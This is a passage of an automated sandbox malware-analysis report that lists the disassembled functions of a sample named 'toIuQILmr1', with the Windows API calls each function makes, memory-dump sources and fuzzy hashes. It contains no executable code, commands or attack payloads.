                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ColorDialogNtdllProc_$LongWindow
                                          • String ID:
                                          • API String ID: 591255283-0
                                          • Opcode ID: ab4ce32cb18e3aad4f146bcaf2289f49c5fc2164c9d59062fddb0c8b17cf4313
                                          • Instruction ID: 8541766bc78a7e1f1931eab4919d4d044e61637fda23751d6a91089265e906fc
                                          • Opcode Fuzzy Hash: ab4ce32cb18e3aad4f146bcaf2289f49c5fc2164c9d59062fddb0c8b17cf4313
                                          • Instruction Fuzzy Hash: 29A18B78105545BFE638AB298C99DBF359CEB42346F28251BF442F63D6CE20CC46D6B1
                                          Function 00E46A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E480A0: inet_addr.WS2_32(00000000), ref: 00E480CB
                                          • socket.WS2_32(00000002,00000002,00000011), ref: 00E46AB1
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E46ADA
                                          • bind.WS2_32(00000000,?,00000010), ref: 00E46B13
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E46B20
                                          • closesocket.WS2_32(00000000), ref: 00E46B34
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 99427753-0
                                          • Opcode ID: 455eab7ee60b1b5119b38d3201ff72aa09d9d57e356de6b858ce947b3e87536b
                                          • Instruction ID: f2786808c275e17c6e5fec8007d4d785695efdb2b9aec97852a6fd81dec666a2
                                          • Opcode Fuzzy Hash: 455eab7ee60b1b5119b38d3201ff72aa09d9d57e356de6b858ce947b3e87536b
                                          • Instruction Fuzzy Hash: 0F41C275740210AFEB10BF24DC96F6EB7A8DB09710F04945AF91ABB3D2DA719D008BB1
                                          Function 00E555FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: 4b14f2554d5d80235b9e0373e06683637a901f19a02bc11920ce205348179cc3
                                          • Instruction ID: 62d735ddf065994cf34dc080829d359e860e0fa6f40441425401f077a260711f
                                          • Opcode Fuzzy Hash: 4b14f2554d5d80235b9e0373e06683637a901f19a02bc11920ce205348179cc3
                                          • Instruction Fuzzy Hash: 6E11C8333006509FD7211F27DC64B6FB798EF44726B81582AFC06F7241CBB09D058AA5
                                          Function 00DE3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __itow__swprintf
                                          • String ID:
                                          • API String ID: 674341424-0
                                          • Opcode ID: 6ce0fc4889699d26c98d778ebfce97aa376dae03d37a6e60766e470cd36fa888
                                          • Instruction ID: 7b9fc9bd8ee8877f75911834bb5041c949c1a0f59818c2ee9ac5c17b4c4ba1e2
                                          • Opcode Fuzzy Hash: 6ce0fc4889699d26c98d778ebfce97aa376dae03d37a6e60766e470cd36fa888
                                          • Instruction Fuzzy Hash: 07229B716083419FC724EF24C895BABB7E4EF84704F14491DF99AA7391DB31EA44CBA2
                                          Function 00E4F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00E4F151
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00E4F15F
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00E4F21F
                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E4F22E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                          • String ID:
                                          • API String ID: 2576544623-0
                                          • Opcode ID: 1deaae7efb37edc70328a24da4920c2cbacdee284fa5f365ec01cfe4389ab019
                                          • Instruction ID: e0c5c63e6e19d67df91d908320575f0e9d1033cb7d097441317280c050f7f03b
                                          • Opcode Fuzzy Hash: 1deaae7efb37edc70328a24da4920c2cbacdee284fa5f365ec01cfe4389ab019
                                          • Instruction Fuzzy Hash: 8D517D71504711AFD310EF24DC95E6BB7E8FF94710F10582EF495972A2EB70A908CBA2
                                          Function 00E5C788 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • GetCursorPos.USER32(?), ref: 00E5C7C2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E0BBFB,?,?,?,?,?), ref: 00E5C7D7
                                          • GetCursorPos.USER32(?), ref: 00E5C824
                                          • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E0BBFB,?,?,?), ref: 00E5C85E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                          • String ID:
                                          • API String ID: 1423138444-0
                                          • Opcode ID: ff9deda90ba9b78a8c847c4731f078bb922f507f0182cdb578a93192a0f63b4a
                                          • Instruction ID: f647526dd80feb79eae610cd8ca1d15d95809f747524e4e67c77aebf94fb3304
                                          • Opcode Fuzzy Hash: ff9deda90ba9b78a8c847c4731f078bb922f507f0182cdb578a93192a0f63b4a
                                          • Instruction Fuzzy Hash: A831E635500218AFCB19CF59C8A8EEA7BB5EB09315F144466FD05A7261C731AD54DF60
                                          Function 00E340B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E340D1
                                          • _memset.LIBCMT ref: 00E340F2
                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E34144
                                          • CloseHandle.KERNEL32(00000000), ref: 00E3414D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                          • String ID:
                                          • API String ID: 1157408455-0
                                          • Opcode ID: f8525cba7387b1cdca07263f0bbdbb5b10992e039fa414f217e8b79e657b3b08
                                          • Instruction ID: a8fad87f1c1ee40b94fe2f8a9aa3745f1e31330a640fe596c869542cb2427bf0
                                          • Opcode Fuzzy Hash: f8525cba7387b1cdca07263f0bbdbb5b10992e039fa414f217e8b79e657b3b08
                                          • Instruction Fuzzy Hash: E811EBB59013287AD7305BA59C4DFABBB7CEF44760F104596F908E7190D6744E84CBA4
                                          Function 00DD1290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00DD12D8
                                          • GetClientRect.USER32(?,?), ref: 00E0B84B
                                          • GetCursorPos.USER32(?), ref: 00E0B855
                                          • ScreenToClient.USER32(?,?), ref: 00E0B860
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                          • String ID:
                                          • API String ID: 1010295502-0
                                          • Opcode ID: 1c55d2a9841bdc75588f02e7210863eccfab810283c7dde6edcf4c177b8008ce
                                          • Instruction ID: cc8eb283778abcf5c67a8fc5e005e622253b7549d42581ae858866d74bc79334
                                          • Opcode Fuzzy Hash: 1c55d2a9841bdc75588f02e7210863eccfab810283c7dde6edcf4c177b8008ce
                                          • Instruction Fuzzy Hash: A4112539A00119BFCB14EFA9D8869BE7BB9FB05301F100866F941E7250D731AA558BB9
                                          Function 00E425E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E41AFE,00000000), ref: 00E426D5
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E4270C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: f7e4c6f5f54e6a9c5dc031efeb08c66fbecf8b214d9e1aa4b537a7597b393286
                                          • Instruction ID: 5af4d7e563a5aa6d01248bd68d57f11e5208e13602200f961e9f89a549ba9f25
                                          • Opcode Fuzzy Hash: f7e4c6f5f54e6a9c5dc031efeb08c66fbecf8b214d9e1aa4b537a7597b393286
                                          • Instruction Fuzzy Hash: 04410571900309BFEB20DF55EC85EBBB7BCEB40328F5150AEF701B6141EA719E419664
                                          Function 00E3B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E3B5AE
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E3B608
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E3B655
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: ff51a9c2d36d41215e361d063c2f2548508c3f00d990c8405480ef9a96fb9886
                                          • Instruction ID: 765b070c9ab7a8ba915b7870cb44cdbeb2f1143d9872f32bab13de61b7f5c154
                                          • Opcode Fuzzy Hash: ff51a9c2d36d41215e361d063c2f2548508c3f00d990c8405480ef9a96fb9886
                                          • Instruction Fuzzy Hash: BE219275A00618EFCB00EF65D884EADFBB8FF48310F0490AAE905AB351CB31A905CB60
                                          Function 00E28CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF0FF6: std::exception::exception.LIBCMT ref: 00DF102C
                                            • Part of subcall function 00DF0FF6: __CxxThrowException@8.LIBCMT ref: 00DF1041
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E28D0D
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E28D3A
                                          • GetLastError.KERNEL32 ref: 00E28D47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                          • String ID:
                                          • API String ID: 1922334811-0
                                          • Opcode ID: ff4dc92cbbb6b0db67a8f3e63f9b4a1a3a3fdc4f4bd82f6eefb13a3b18b5da25
                                          • Instruction ID: 47a9749e6184a9c5000d7db6cea2ef1ede8deb70b5d73c90df8b862c623c3e5a
                                          • Opcode Fuzzy Hash: ff4dc92cbbb6b0db67a8f3e63f9b4a1a3a3fdc4f4bd82f6eefb13a3b18b5da25
                                          • Instruction Fuzzy Hash: 25118FB1414309AFE728AF54ED86D6BB7BCEF44711B25852EF456A3681EF30AC448A70
                                          Function 00E34C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E34C2C
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E34C43
                                          • FreeSid.ADVAPI32(?), ref: 00E34C53
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: 7da00b8eec6779c59db1a04ea598dd9ce066939fb2e111215aa202df3e6de059
                                          • Instruction ID: c096a8fa1fe39c733adb687d0de2f750515e04d1b71136905c55dcd644e96f81
                                          • Opcode Fuzzy Hash: 7da00b8eec6779c59db1a04ea598dd9ce066939fb2e111215aa202df3e6de059
                                          • Instruction Fuzzy Hash: 97F04F7591130CBFDF04DFF1DC89AAEBBBCEF08212F0048A9E501E2181D6706A088B50
                                          Function 00DDE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3fff634951380e9c4973cfafe2fdbfff1fef676ceb21f4a85a4768e1aea00e7c
                                          • Instruction ID: 89bd69133d46a8a6d9019cc11fe6f3ce61c6beaa3933bbccbc6c9e1372d85fb7
                                          • Opcode Fuzzy Hash: 3fff634951380e9c4973cfafe2fdbfff1fef676ceb21f4a85a4768e1aea00e7c
                                          • Instruction Fuzzy Hash: 75228F74A00215DFDB24EF54C481ABEBBF4FF04310F18856AE996AB351E734E985CBA1
                                          Function 00DD16DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          • GetParent.USER32(?), ref: 00E0BA0A
                                          • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00DD19B3,?,?,?,00000006,?), ref: 00E0BA84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LongWindow$DialogNtdllParentProc_
                                          • String ID:
                                          • API String ID: 314495775-0
                                          • Opcode ID: b67afb1465354d9eb1d3035eb5254644d1be8d5854a318d3e803edd309b9c7bf
                                          • Instruction ID: f7eb862ffb7827aeab927fa28f83ecae665b0873be84049cd2429d28ecae5dae
                                          • Opcode Fuzzy Hash: b67afb1465354d9eb1d3035eb5254644d1be8d5854a318d3e803edd309b9c7bf
                                          • Instruction Fuzzy Hash: D3218038600104BFCB248F68C885DA93BA6EB4A364F684257F5256B3F2C7319D529B60
                                          Function 00E3C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E3C966
                                          • FindClose.KERNEL32(00000000), ref: 00E3C996
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
